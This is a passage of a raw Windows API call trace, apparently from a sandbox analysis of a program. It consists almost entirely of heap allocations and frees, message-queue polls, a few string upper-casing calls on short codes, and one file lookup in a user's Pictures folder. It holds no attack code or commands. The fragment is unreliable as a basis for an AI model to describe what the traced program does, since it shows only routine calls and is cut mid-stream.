(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0209.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0209.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0209.900] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0209.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0209.900] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0209.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0209.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0209.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0209.900] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0209.900] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0209.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0209.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0209.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0209.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0209.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.906] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0209.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0209.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0209.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0209.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0209.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0209.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0209.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0209.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.907] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0209.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0209.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0209.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.908] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0209.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0209.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0209.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0209.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0209.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0209.909] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/F3GpsjDs7t.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63a4ab90, ftCreationTime.dwHighDateTime=0x1d5cfc9, ftLastAccessTime.dwLowDateTime=0xfec1ce90, ftLastAccessTime.dwHighDateTime=0x1d5d37b, ftLastWriteTime.dwLowDateTime=0xfec1ce90, ftLastWriteTime.dwHighDateTime=0x1d5d37b, nFileSizeHigh=0x0, nFileSizeLow=0x1265e, dwReserved0=0x0, dwReserved1=0x0, cFileName="F3GpsjDs7t.png", cAlternateFileName="F3GPSJ~1.PNG")) returned 0x9e2078 [0209.909] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0209.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0209.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0209.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0209.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.911] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.911] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.911] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.911] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0209.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.911] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0209.914] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.914] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0209.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.914] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.914] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.915] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0209.915] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, 